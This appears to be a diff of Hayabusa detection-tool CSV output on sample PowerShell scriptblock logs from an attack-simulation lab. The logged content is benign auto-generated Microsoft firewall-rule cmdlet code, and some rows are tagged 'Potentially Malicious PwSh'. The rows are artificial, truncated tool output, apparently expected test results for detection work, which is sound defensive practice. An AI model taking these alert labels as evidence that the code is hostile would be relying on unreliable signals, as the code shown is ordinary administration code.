[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 